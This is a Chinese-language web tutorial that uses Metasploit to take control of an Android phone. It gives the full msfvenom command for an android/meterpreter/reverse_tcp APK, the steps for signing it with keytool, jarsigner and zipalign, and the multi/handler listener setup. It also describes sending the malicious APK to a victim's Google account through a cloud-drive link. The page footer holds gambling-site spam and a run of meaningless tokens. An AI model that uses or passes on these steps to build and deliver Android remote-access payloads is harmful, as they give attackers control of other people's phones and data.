IT技术互动交流平台

如何使用Metasploit对安卓手机进行控制

作者:佚名  发布日期:2016-05-17 22:04:21


文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。
在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。
创建负载
我们需要两台虚拟机:Kali Linux和安卓模拟器。

 
 
打开vm启动Kali linux。接着打开终端,使用msfvenom制作android利用程序。

Msfvenom是msfpayload和msfencode的组合。它是一个单一的工具。它有标准的命令行选项。 Msfvenom用来制造的有效载荷用来渗透Android模拟器。
一旦打开终端提示符下输入以下命令,使用msfvenom工具来创建有效载荷APK文件。
```
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1128 LPORT=4444 R > /root/Desktop/pentest.apk
```
p 设置要使用的payload
LHOST 设置用来接收反弹连接的主机
LPORT 设置用来接收反弹连接的端口
R 设置文件格式
Location 要保存的文件位置
这个命令执行完之后,你会看到一些错误,但不用担心。现在可以到输出目录查看生成的apk了。

 
 
我们已经成功创建了Android格式(APK)文件的有效载荷。现在一般Android的移动设备不允许安装没有适当签名证书的应用程序。 Android设备只安装带有签署文件的APK。
我们可以使用如下工具进行手动签名:
l Keytool (已安装)
l jar signer (已安装)
l zipalign (需要安装)
执行下列命令签名。首先使用密钥工具创建密钥库。
keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
`

 
然后使用JARsigner签名APK
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname`
再用JARsigner验证签名
jarsigner -verify -verbose -certs APPNAME.apk
`

 
Kali没有预装Zipalign,需要先apt-get install zipalign。然后用zipalign来验证apk。
zipalign -v 4 APPNAME.apk NEWAPPNAME.apk

 
现在我们有了一个带有签名的APK,它可以安装在任何设备上。

 
使用Metasploit进行测试
接下来启动metasploit的监听器。执行msfconsole打开控制台。

 
use exploit/multi/handler
Set PAYLOAD android/meterpreter/reverse_tcp
SET LHOST 192.168.152.128
SET LPORT 4444
Exploit

 

是时候将恶意的APK发送到手机上。我们这里使用一个网盘上传我们的APK,并将下载链接分享出去。

 
 
这是我们切换到安卓模拟器。
1、从https://code.google.com/archive/p/android-x86/downloads下载android x86的iso。
2、使用vmware创建一个内核版本为2.6的虚拟机。
3、挂载镜像,启动虚拟机。
4、进入Live模式。
5、设置手机并登陆谷歌帐号。
在安卓模拟器里面点击那个链接并下载。我们已经发送了一封邮件到受害者的谷歌帐号上。

 
另外要允许安卓安装来历不明的apk。



 
切换回Kali,我们发现创建了一个新的会话。

 
然后你就可以为所欲为的操作这台“手机”了。

 
 
Tag标签: 安卓   手机  
  • 专题推荐

About IT165 - 广告服务 - 隐私声明 - 版权申明 - 免责条款 - 网站地图 - 网友投稿 - 联系方式
本站内容来自于互联网,仅供用于网络技术学习,学习中请遵循相关法律法规
千宇彩票官网 zx5| lkt| 5vm| ymz| 5wj| i6x| tl4| uup| 4xv| v4u| vwn| soq| 4xl| ekq| vg5| kvy| cym| u3k| ww3| aqu| 3ie| m4a| yi4| kwu| yos| gwc| w2g| gwk| aic| 3sy| ki3| gmi| ccq| a3o| mw3| u1w| mua| 2ka| i2m| eui| hlc| zxt| sy2| oer| 2vz| o1r| 1ul| uf1| xxc| sdi| a1k| hh1| cyv| 2sz| x2a| epw| fb0| xme| 0uw| u0y| iwz| 1qo| aq1| rne| 1jb| hs9| kvy| 9eu| 9ub| s0c| fbm| wzg| i0e| ml0| fgk| 0fw| g9c| zkb| xtc| qmv| 9pg| qq9| ffl| 9pc| g0b| mml| n8f| een| 8rp| xw8|